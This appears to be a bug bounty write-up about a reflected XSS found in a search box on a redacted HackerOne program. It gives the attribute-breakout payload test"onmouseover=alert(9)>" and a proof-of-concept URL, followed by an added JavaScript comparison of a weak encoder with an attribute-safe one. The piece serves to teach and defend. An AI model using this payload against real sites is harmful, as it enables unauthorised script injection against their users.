XSS Restriction Bypass on a HackerOne Program


bugbounty_learners

Hi Everyone,

Hello guys 👋👋 In this article, I’m going to talk about how to bypass an XSS restriction, leading to a reflected XSS bug I discovered in a HackerOne bug bounty program, which I’m going to refer to as redacted, that allowed me to get paid a reward 🫡😅.

Severity: Medium
Platform: HackerOne Public Program

Steps Taken

1. Go to your site https://targetsite.com
2. Navigate to the search box and enter test">test
3. Inspect the page and note that ">test was escaped
4. After that, create the following payload: test"onmouseover=alert(9)>"
5. XSS was triggered

PoC:

https://vulnerable site.com/?s=test%22onmouseover=alert(9)%3E%22
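Why the restriction failed to contain the payload, as an added example that is not code from the original write-up or from the affected program: it compares an encoder that neutralises only angle brackets with one that is safe for a quoted attribute value. It assumes the search term is reflected inside a double-quoted attribute and that the site's filter encoded only `<` and `>`; the template and all function names are hypothetical.

```javascript
// Added example: the filter behaviour and the template are assumptions.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Assumed weak filter: encodes only the tag delimiters, leaving quotes intact.
function escapeTagsOnly(s) {
  return s.replace(/[<>]/g, (c) => ENTITIES[c]);
}

// Attribute-safe encoder: quotes and ampersands are encoded as well.
function escapeAttr(s) {
  return s.replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Hypothetical search template reflecting the term inside a quoted attribute.
function renderSearchBox(term, encode) {
  return `<input type="text" name="s" value="${encode(term)}">`;
}

// Lists the attribute names of one start tag, roughly as a browser tokenizer would.
function attributeNames(tag) {
  const names = [];
  let i = tag.indexOf("<") + 1;
  while (i < tag.length && !/[\s>]/.test(tag[i])) i++;       // skip the tag name
  while (i < tag.length && tag[i] !== ">") {
    while (i < tag.length && /[\s/]/.test(tag[i])) i++;       // skip separators
    if (i >= tag.length || tag[i] === ">") break;
    const start = i;
    while (i < tag.length && !/[\s=>]/.test(tag[i])) i++;     // attribute name
    names.push(tag.slice(start, i).toLowerCase());
    while (i < tag.length && /\s/.test(tag[i])) i++;
    if (tag[i] !== "=") continue;                             // attribute without a value
    i++;
    while (i < tag.length && /\s/.test(tag[i])) i++;
    const quote = tag[i];
    if (quote === '"' || quote === "'") {
      i = tag.indexOf(quote, i + 1);                          // quoted value ends at the matching quote
      if (i === -1) break;
      i++;
    } else {
      while (i < tag.length && !/[\s>]/.test(tag[i])) i++;    // unquoted value
    }
  }
  return names;
}

// Attributes the template never emits, i.e. ones created by the reflected input.
function injectedAttributes(tag) {
  const expected = new Set(["type", "name", "value"]);
  return attributeNames(tag).filter((n) => !expected.has(n));
}

const PAYLOAD = 'test"onmouseover=alert(9)>"';               // decoded from the PoC URL above
console.log(injectedAttributes(renderSearchBox(PAYLOAD, escapeTagsOnly)));
console.log(injectedAttributes(renderSearchBox(PAYLOAD, escapeAttr)));
```

The same `injectedAttributes` check can serve as a regression test for any template that reflects user input into an attribute.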

XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. The most severe XSS attacks involve disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account.

I Reported: March 15, 2023, 4:22pm UTC
Original Report: March 1, 2023, 12:55pm UTC

Thanks for Reading & Happy Hunting! 🤗


— — — — — — — — — — — — — — — — — — — — — — — —

Sharing Bug Bounty Tips on

🔸 YouTube.com/chhota_hacker

🔸 Telegram.me/chhota_hacker

🔸 Twitter.com/chhota_hacker
